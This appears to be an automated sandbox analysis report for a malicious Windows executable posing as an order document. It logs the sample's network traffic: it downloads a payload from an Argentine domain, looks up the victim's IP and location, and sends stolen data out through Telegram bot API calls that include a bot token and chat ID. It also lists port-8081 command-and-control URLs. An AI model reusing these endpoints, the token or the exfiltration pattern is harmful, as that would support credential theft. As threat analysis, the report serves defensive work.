            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49800 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /yak/ZnWGURK2.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: sierrassinfinusadas.com.arCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20and%20Time:%2022/11/2024%20/%2006:52:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20897506%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: sierrassinfinusadas.com.ar
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553726543&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0b4a7224cc3aHost: api.telegram.orgContent-Length: 580
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 21 Nov 2024 08:01:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: ORDER 20240986 OA.exe, 00000000.00000000.1676481705.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ORDER 20240986 OA.exe, 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:897506%0D%0ADate%20a
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D92000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C8D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C8D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2950903894.0000000007718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sierrassinfinusadas.com.ar/yak/ZnWGURK2.bin3
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF6000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CA8000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F4F000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038D1D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF9000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E28000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E53000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CAF000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F2A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF6000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CA8000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F4F000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CDA000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038D1D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF9000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E28000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E53000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CAF000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F2A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
            Source: ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBdq
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
            Source: unknownHTTPS traffic detected: 167.250.5.91:443 -> 192.168.2.4:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49876 version: TLS 1.2
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: ORDER 20240986 OA.exe
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_00404C7B0_2_00404C7B
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 0_2_6FBB1B630_2_6FBB1B63
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00404C7B4_2_00404C7B
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015C1464_2_0015C146
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015D2784_2_0015D278
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_001553624_2_00155362
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015C4724_2_0015C472
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015C7384_2_0015C738
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015E9884_2_0015E988
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_001569A04_2_001569A0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_001529E04_2_001529E0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015CA084_2_0015CA08
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015CCD84_2_0015CCD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00159DE04_2_00159DE0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015CFAA4_2_0015CFAA
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00156FC84_2_00156FC8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015E97A4_2_0015E97A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0015F9614_2_0015F961
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_00153E094_2_00153E09
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075666784_2_07566678
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075687F04_2_075687F0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756C1504_2_0756C150
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075609504_2_07560950
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07567E504_2_07567E50
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07563B584_2_07563B58
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756EC584_2_0756EC58
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756A9584_2_0756A958
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756C1424_2_0756C142
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075600404_2_07560040
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07566B404_2_07566B40
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07563B4A4_2_07563B4A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07565B484_2_07565B48
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075696484_2_07569648
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756EC494_2_0756EC49
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075666754_2_07566675
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756D4704_2_0756D470
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075612704_2_07561270
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075691714_2_07569171
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756E77F4_2_0756E77F
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075644784_2_07564478
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075624784_2_07562478
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756BC784_2_0756BC78
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075609604_2_07560960
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07567E604_2_07567E60
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756D4604_2_0756D460
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756A9684_2_0756A968
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075644684_2_07564468
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075600124_2_07560012
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075617104_2_07561710
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07569B104_2_07569B10
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756F1114_2_0756F111
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756AE1F4_2_0756AE1F
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075629184_2_07562918
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756C6184_2_0756C618
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075683184_2_07568318
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075652194_2_07565219
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075629074_2_07562907
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756DE004_2_0756DE00
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075649084_2_07564908
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075670084_2_07567008
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756C6084_2_0756C608
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075666094_2_07566609
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075696374_2_07569637
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756AE304_2_0756AE30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07566B304_2_07566B30
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075632384_2_07563238
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756D9384_2_0756D938
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07565B394_2_07565B39
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756D9274_2_0756D927
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756F1204_2_0756F120
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756322A4_2_0756322A
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075652284_2_07565228
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075683284_2_07568328
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756F5D74_2_0756F5D7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075604D04_2_075604D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_075674D04_2_075674D0
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756CAD14_2_0756CAD1
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07565FD84_2_07565FD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07569FD84_2_07569FD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07563FD84_2_07563FD8
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_07565FC74_2_07565FC7
            Source: C:\Users\user\Desktop\ORDER 20240986 OA.exeCode function: 4_2_0756B7C04_2_0756B7C0
